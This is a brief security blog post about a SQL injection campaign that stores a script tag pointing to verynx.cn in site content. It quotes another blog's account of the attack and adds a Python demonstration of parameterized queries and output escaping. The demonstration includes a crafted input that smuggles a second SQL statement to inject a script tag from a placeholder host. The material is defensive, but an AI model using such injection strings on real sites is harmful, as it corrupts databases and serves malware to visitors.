SQL injection attack attempts XSS


It seems like SQL injection is coming back into style. This attack injects some HTML and a reference to an off-site JavaScript file. The sad part here is that this stuff still works. If an application is written properly, both input and output are sanitized, so that even if the code gets into the database, it will never be displayed in a form the browser will execute.
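Both halves of that claim, as an added example that is not part of the original post: a concatenated statement beside a parameterized one, then output encoding applied to a row that is already tainted. The table, the function names and the placeholder script host are constructed for illustration, and `executescript()` stands in for a database driver that accepts batched statements.

```python
import html
import sqlite3

# Constructed input: a page id followed by a second statement that appends
# markup to stored text. The script host is a placeholder, not from the post.
TAG = '<script src="http://payload.example.invalid/x.js"></script>'
HOSTILE_ID = "1; UPDATE pages SET title = title || '" + TAG + "'"


def new_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, hits INTEGER)")
    db.execute("INSERT INTO pages VALUES (1, 'Welcome', 0)")
    return db


def record_hit_unsafe(db, page_id):
    # Weak: request text is concatenated into the SQL. executescript() is an
    # assumption standing in for a driver that runs batched statements.
    db.executescript("UPDATE pages SET hits = hits + 1 WHERE id = " + page_id)


def record_hit_safe(db, page_id):
    # Input side: the value is bound as a parameter and is never parsed as SQL.
    db.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (page_id,))


def stored_title(db):
    return db.execute("SELECT title FROM pages WHERE id = 1").fetchone()[0]


def render_title(db):
    # Output side: encode on the way out, so markup already in the table is
    # shown as text instead of being parsed by the browser.
    return "<h1>" + html.escape(stored_title(db)) + "</h1>"


if __name__ == "__main__":
    bad, good = new_db(), new_db()
    record_hit_unsafe(bad, HOSTILE_ID)
    record_hit_safe(good, HOSTILE_ID)
    print("concatenated: ", stored_title(bad))
    print("parameterized:", stored_title(good))
    print("rendered from the tainted table:", render_title(bad))
```

The parameterized call leaves the row untouched because the whole string is compared against `id` as a value, and the encoded render shows that a tainted row reaches the browser as inert text.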

From rtraction:

A new SQL injection hack seems to be out in the wild from verynx.cn. The SQL Injection hack uses a CHAR array to hide its payload, which will insert some various HTML garbage along with a reference to a JavaScript file on the verynx.cn domain that will infect users when they visit your website. Luckily, the domain with the offending JavaScript file now points to 127.0.0.1, which will help stop the spread of the virus. Unfortunately, the botnet still seems to be spamming websites with the scripted attack, leaving many entirely broken or loading extremely slowly, as each page might have hundreds of requests to the payload. [From rtraction » Blog Archive » SQL Injection Hack using CAST from 1.verynx.cn]
